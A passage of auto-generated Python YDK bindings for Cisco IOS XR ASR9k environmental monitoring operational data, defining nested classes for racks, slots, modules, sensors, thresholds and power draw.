if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli, self).__init__()
self.yang_name = "rack-cli"
self.yang_parent_name = "rack-clis"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['rack']
self._child_classes = OrderedDict([("slot-clis", ("slot_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis))])
self._leafs = OrderedDict([
('rack', (YLeaf(YType.uint32, 'rack'), ['int'])),
])
self.rack = None
self.slot_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis()
self.slot_clis.parent = self
self._children_name_map["slot_clis"] = "slot-clis"
self._segment_path = lambda: "rack-cli" + "[rack='" + str(self.rack) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-asr9k-sc-envmon-oper:environmental-monitoring-cli/rack-clis/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli, ['rack'], name, value)
class SlotClis(_Entity_):
"""
Table of slots
.. attribute:: slot_cli
Name
**type**\: list of :py:class:`SlotCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis, self).__init__()
self.yang_name = "slot-clis"
self.yang_parent_name = "rack-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("slot-cli", ("slot_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli))])
self._leafs = OrderedDict()
self.slot_cli = YList(self)
self._segment_path = lambda: "slot-clis"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis, [], name, value)
class SlotCli(_Entity_):
"""
Name
.. attribute:: slot (key)
Slot name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: module_clis
Table of modules
**type**\: :py:class:`ModuleClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli, self).__init__()
self.yang_name = "slot-cli"
self.yang_parent_name = "slot-clis"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['slot']
self._child_classes = OrderedDict([("module-clis", ("module_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis))])
self._leafs = OrderedDict([
('slot', (YLeaf(YType.str, 'slot'), ['str'])),
])
self.slot = None
self.module_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis()
self.module_clis.parent = self
self._children_name_map["module_clis"] = "module-clis"
self._segment_path = lambda: "slot-cli" + "[slot='" + str(self.slot) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli, ['slot'], name, value)
class ModuleClis(_Entity_):
"""
Table of modules
.. attribute:: module_cli
Name
**type**\: list of :py:class:`ModuleCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis, self).__init__()
self.yang_name = "module-clis"
self.yang_parent_name = "slot-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("module-cli", ("module_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli))])
self._leafs = OrderedDict()
self.module_cli = YList(self)
self._segment_path = lambda: "module-clis"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis, [], name, value)
class ModuleCli(_Entity_):
"""
Name
.. attribute:: module (key)
Module name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: sensor_type_clis
Table of sensor types
**type**\: :py:class:`SensorTypeClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis>`
**config**\: False
.. attribute:: power_cli
Module Power Draw
**type**\: :py:class:`PowerCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli, self).__init__()
self.yang_name = "module-cli"
self.yang_parent_name = "module-clis"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['module']
self._child_classes = OrderedDict([("sensor-type-clis", ("sensor_type_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis)), ("power-cli", ("power_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli))])
self._leafs = OrderedDict([
('module', (YLeaf(YType.str, 'module'), ['str'])),
])
self.module = None
self.sensor_type_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis()
self.sensor_type_clis.parent = self
self._children_name_map["sensor_type_clis"] = "sensor-type-clis"
self.power_cli = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli()
self.power_cli.parent = self
self._children_name_map["power_cli"] = "power-cli"
self._segment_path = lambda: "module-cli" + "[module='" + str(self.module) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli, ['module'], name, value)
class SensorTypeClis(_Entity_):
"""
Table of sensor types
.. attribute:: sensor_type_cli
Type of sensor
**type**\: list of :py:class:`SensorTypeCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis, self).__init__()
self.yang_name = "sensor-type-clis"
self.yang_parent_name = "module-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("sensor-type-cli", ("sensor_type_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli))])
self._leafs = OrderedDict()
self.sensor_type_cli = YList(self)
self._segment_path = lambda: "sensor-type-clis"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis, [], name, value)
class SensorTypeCli(_Entity_):
"""
Type of sensor
.. attribute:: type (key)
Sensor type
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: sensor_name_clis
Table of sensors
**type**\: :py:class:`SensorNameClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli, self).__init__()
self.yang_name = "sensor-type-cli"
self.yang_parent_name = "sensor-type-clis"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([("sensor-name-clis", ("sensor_name_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis))])
self._leafs = OrderedDict([
('type', (YLeaf(YType.str, 'type'), ['str'])),
])
self.type = None
self.sensor_name_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis()
self.sensor_name_clis.parent = self
self._children_name_map["sensor_name_clis"] = "sensor-name-clis"
self._segment_path = lambda: "sensor-type-cli" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli, ['type'], name, value)
class SensorNameClis(_Entity_):
"""
Table of sensors
.. attribute:: sensor_name_cli
Name of sensor
**type**\: list of :py:class:`SensorNameCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis, self).__init__()
self.yang_name = "sensor-name-clis"
self.yang_parent_name = "sensor-type-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("sensor-name-cli", ("sensor_name_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli))])
self._leafs = OrderedDict()
self.sensor_name_cli = YList(self)
self._segment_path = lambda: "sensor-name-clis"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis, [], name, value)
class SensorNameCli(_Entity_):
"""
Name of sensor
.. attribute:: name (key)
Sensor name
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: value_detailed_cli
Detailed sensor information including the sensor value
**type**\: :py:class:`ValueDetailedCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli>`
**config**\: False
.. attribute:: threshold_clis
The threshold information
**type**\: :py:class:`ThresholdClis <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis>`
**config**\: False
.. attribute:: value_brief_cli
The sensor value
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli, self).__init__()
self.yang_name = "sensor-name-cli"
self.yang_parent_name = "sensor-name-clis"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['name']
self._child_classes = OrderedDict([("value-detailed-cli", ("value_detailed_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli)), ("threshold-clis", ("threshold_clis", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis))])
self._leafs = OrderedDict([
('name', (YLeaf(YType.str, 'name'), ['str'])),
('value_brief_cli', (YLeaf(YType.str, 'value-brief-cli'), ['str'])),
])
self.name = None
self.value_brief_cli = None
self.value_detailed_cli = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli()
self.value_detailed_cli.parent = self
self._children_name_map["value_detailed_cli"] = "value-detailed-cli"
self.threshold_clis = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis()
self.threshold_clis.parent = self
self._children_name_map["threshold_clis"] = "threshold-clis"
self._segment_path = lambda: "sensor-name-cli" + "[name='" + str(self.name) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli, ['name', 'value_brief_cli'], name, value)
class ValueDetailedCli(_Entity_):
"""
Detailed sensor information including
the sensor value
.. attribute:: field_validity_bitmap
Sensor valid bitmap
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: device_description
Device Name
**type**\: str
**length:** 0..50
**config**\: False
.. attribute:: units
Units of variable being read
**type**\: str
**length:** 0..50
**config**\: False
.. attribute:: device_id
Identifier for this device
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: value
Current reading of sensor
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: alarm_type
Indicates threshold violation
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: data_type
Sensor data type enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: scale
Sensor scale enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: precision
Sensor precision range
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: status
Sensor operation state enums
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: age_time_stamp
Age of the sensor value; set to the current time if directly access the value from sensor
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: update_rate
Sensor value update rate;set to 0 if sensor value is updated and evaluated immediately
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: average
Average sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: minimum
Minimum Sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: maximum
Maximum Sensor value over time interval
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: interval
Time Interval over which sensor value is monitored
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli, self).__init__()
self.yang_name = "value-detailed-cli"
self.yang_parent_name = "sensor-name-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('field_validity_bitmap', (YLeaf(YType.uint32, 'field-validity-bitmap'), ['int'])),
('device_description', (YLeaf(YType.str, 'device-description'), ['str'])),
('units', (YLeaf(YType.str, 'units'), ['str'])),
('device_id', (YLeaf(YType.uint32, 'device-id'), ['int'])),
('value', (YLeaf(YType.uint32, 'value'), ['int'])),
('alarm_type', (YLeaf(YType.uint32, 'alarm-type'), ['int'])),
('data_type', (YLeaf(YType.uint32, 'data-type'), ['int'])),
('scale', (YLeaf(YType.uint32, 'scale'), ['int'])),
('precision', (YLeaf(YType.uint32, 'precision'), ['int'])),
('status', (YLeaf(YType.uint32, 'status'), ['int'])),
('age_time_stamp', (YLeaf(YType.uint32, 'age-time-stamp'), ['int'])),
('update_rate', (YLeaf(YType.uint32, 'update-rate'), ['int'])),
('average', (YLeaf(YType.int32, 'average'), ['int'])),
('minimum', (YLeaf(YType.int32, 'minimum'), ['int'])),
('maximum', (YLeaf(YType.int32, 'maximum'), ['int'])),
('interval', (YLeaf(YType.int32, 'interval'), ['int'])),
])
self.field_validity_bitmap = None
self.device_description = None
self.units = None
self.device_id = None
self.value = None
self.alarm_type = None
self.data_type = None
self.scale = None
self.precision = None
self.status = None
self.age_time_stamp = None
self.update_rate = None
self.average = None
self.minimum = None
self.maximum = None
self.interval = None
self._segment_path = lambda: "value-detailed-cli"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli, ['field_validity_bitmap', 'device_description', 'units', 'device_id', 'value', 'alarm_type', 'data_type', 'scale', 'precision', 'status', 'age_time_stamp', 'update_rate', 'average', 'minimum', 'maximum', 'interval'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ValueDetailedCli']['meta_info']
class ThresholdClis(_Entity_):
"""
The threshold information
.. attribute:: threshold_cli
Types of thresholds
**type**\: list of :py:class:`ThresholdCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis, self).__init__()
self.yang_name = "threshold-clis"
self.yang_parent_name = "sensor-name-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("threshold-cli", ("threshold_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli))])
self._leafs = OrderedDict()
self.threshold_cli = YList(self)
self._segment_path = lambda: "threshold-clis"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis, [], name, value)
class ThresholdCli(_Entity_):
"""
Types of thresholds
.. attribute:: type (key)
Threshold type
**type**\: str
**pattern:** [\\w\\\-\\.\:,\_@#%$\\+=\\\|;]+
**config**\: False
.. attribute:: value_detailed_cli
Detailed sensor threshold information
**type**\: :py:class:`ValueDetailedCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli>`
**config**\: False
.. attribute:: trap_cli
Threshold trap enable flag true\-ENABLE, false\-DISABLE
**type**\: bool
**config**\: False
.. attribute:: value_brief_cli
Threshold value for the sensor
**type**\: str
**pattern:** [0\-9a\-fA\-F]{1,8}
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli, self).__init__()
self.yang_name = "threshold-cli"
self.yang_parent_name = "threshold-clis"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['type']
self._child_classes = OrderedDict([("value-detailed-cli", ("value_detailed_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli))])
self._leafs = OrderedDict([
('type', (YLeaf(YType.str, 'type'), ['str'])),
('trap_cli', (YLeaf(YType.boolean, 'trap-cli'), ['bool'])),
('value_brief_cli', (YLeaf(YType.str, 'value-brief-cli'), ['str'])),
])
self.type = None
self.trap_cli = None
self.value_brief_cli = None
self.value_detailed_cli = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli()
self.value_detailed_cli.parent = self
self._children_name_map["value_detailed_cli"] = "value-detailed-cli"
self._segment_path = lambda: "threshold-cli" + "[type='" + str(self.type) + "']"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli, ['type', 'trap_cli', 'value_brief_cli'], name, value)
class ValueDetailedCli(_Entity_):
"""
Detailed sensor threshold
information
.. attribute:: threshold_severity
Indicates minor, major, critical severities
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_relation
Indicates relation between sensor value and threshold
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_value
Value of the configured threshold
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: threshold_evaluation
Indicates the result of the most recent evaluation of the thresholD
**type**\: bool
**config**\: False
.. attribute:: threshold_notification_enabled
Indicates whether or not a notification should result, in case of threshold violation
**type**\: bool
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli, self).__init__()
self.yang_name = "value-detailed-cli"
self.yang_parent_name = "threshold-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('threshold_severity', (YLeaf(YType.uint32, 'threshold-severity'), ['int'])),
('threshold_relation', (YLeaf(YType.uint32, 'threshold-relation'), ['int'])),
('threshold_value', (YLeaf(YType.uint32, 'threshold-value'), ['int'])),
('threshold_evaluation', (YLeaf(YType.boolean, 'threshold-evaluation'), ['bool'])),
('threshold_notification_enabled', (YLeaf(YType.boolean, 'threshold-notification-enabled'), ['bool'])),
])
self.threshold_severity = None
self.threshold_relation = None
self.threshold_value = None
self.threshold_evaluation = None
self.threshold_notification_enabled = None
self._segment_path = lambda: "value-detailed-cli"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli, ['threshold_severity', 'threshold_relation', 'threshold_value', 'threshold_evaluation', 'threshold_notification_enabled'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli.ValueDetailedCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis.ThresholdCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli.ThresholdClis']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis.SensorNameCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli.SensorNameClis']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis.SensorTypeCli']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_asr9k_sc_envmon_oper as meta
return meta._meta_table['EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.SensorTypeClis']['meta_info']
class PowerCli(_Entity_):
"""
Module Power Draw
.. attribute:: power_bag_cli
Detailed power bag information
**type**\: :py:class:`PowerBagCli <ydk.models.cisco_ios_xr.Cisco_IOS_XR_asr9k_sc_envmon_oper.EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli>`
**config**\: False
"""
_prefix = 'asr9k-sc-envmon-oper'
_revision = '2017-01-19'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli, self).__init__()
self.yang_name = "power-cli"
self.yang_parent_name = "module-cli"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_classes = OrderedDict([("power-bag-cli", ("power_bag_cli", EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli))])
self._leafs = OrderedDict()
self.power_bag_cli = EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli.PowerBagCli()
self.power_bag_cli.parent = self
self._children_name_map["power_bag_cli"] = "power-bag-cli"
self._segment_path = lambda: "power-cli"
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(EnvironmentalMonitoringCli.RackClis.RackCli.SlotClis.SlotCli.ModuleClis.ModuleCli.PowerCli, [], name, value)
class PowerBagCli(_Entity_):
"""
Detailed power bag information
.. attribute:: power_value
Current Power Value of the Unit
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: power_max_value
Max Power Value of the Unit
**type**\: int
**range:** \-2147483648..2147483647
**config**\: False
.. attribute:: power_unit_multiplier
Unit Multiplier of Power
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: power_accuracy
Accuracy of the Power Value
**type**\: int
**range:** 0..4294967295
**config**\: False
